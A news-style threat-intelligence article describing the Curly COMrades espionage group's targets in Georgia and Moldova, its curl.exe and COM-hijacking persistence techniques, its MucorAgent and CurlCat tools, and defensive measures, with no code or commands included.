A newly uncovered cyber-espionage group, known as Curly COMrades, has been linked to a series of sophisticated attacks against high-value targets in Eastern Europe. The group has focused its operations on judicial and government bodies in Georgia, as well as an energy distribution company in Moldova. Security analysts believe the group’s tactics and target selection align with Russian geopolitical interests, though official attribution remains under investigation.
The name “Curly COMrades” was inspired by the group’s repeated use of the legitimate command-line utility curl.exe for data transfers, alongside its exploitation of Windows Component Object Model (COM) objects for persistence. This dual technique reflects a deliberate strategy to blend malicious activity with trusted system functions, making detection far more challenging.
Innovative Backdoor and Persistence Tactics
Once inside a target network, Curly COMrades deploys multiple reverse-proxy tunnels using tools like Resocks, custom SOCKS5 servers, SSH, and Stunnel. These allow attackers to move laterally, execute commands, and exfiltrate data without raising immediate suspicion. The group repeatedly attempts to extract sensitive credentials by targeting the NTDS database and dumping LSASS memory.
A central element of their toolkit is a custom .NET backdoor dubbed MucorAgent. This multi-stage Stealthy malware executes AES-encrypted PowerShell scripts and returns the results via secure channels. Notably, MucorAgent maintains persistence by exploiting a disabled scheduled task within NGEN (Native Image Generator), reactivated through COM object hijacking. Because Windows may trigger NGEN unpredictably—such as during idle periods or application updates—this provides the attackers with stealthy, long-term access.
Complementing this is CurlCat, a custom utility disguised as GoogleUpdate.exe. It uses a modified version of the libcurl library with a custom Base64 alphabet to enable bidirectional communication between compromised systems and attacker servers. By transmitting over standard HTTPS connections, CurlCat masks its activity as normal web traffic.
Strategic Risks and Defensive Measures
The Curly COMrades campaign underscores a growing trend among advanced persistent threats: the weaponization of legitimate system components to remain hidden in sensitive environments. By embedding themselves within trusted processes and services, attackers can persist for months without detection, posing significant risks to national security and critical infrastructure.
Defenders are urged to adopt advanced Endpoint Detection and Response (EDR) solutions, apply strict patch management, and leverage behavioral analytics to spot unusual system activities. Continuous monitoring for anomalous use of utilities like curl.exe, unexpected COM object changes, and irregular NGEN task executions could provide early warning of such intrusions.
With geopolitical tensions showing no signs of easing, campaigns like this serve as a stark reminder that cyber-espionage is evolving toward more covert and resilient tactics. Understanding these techniques is critical for organizations seeking to protect themselves from long-term, undetected compromise.
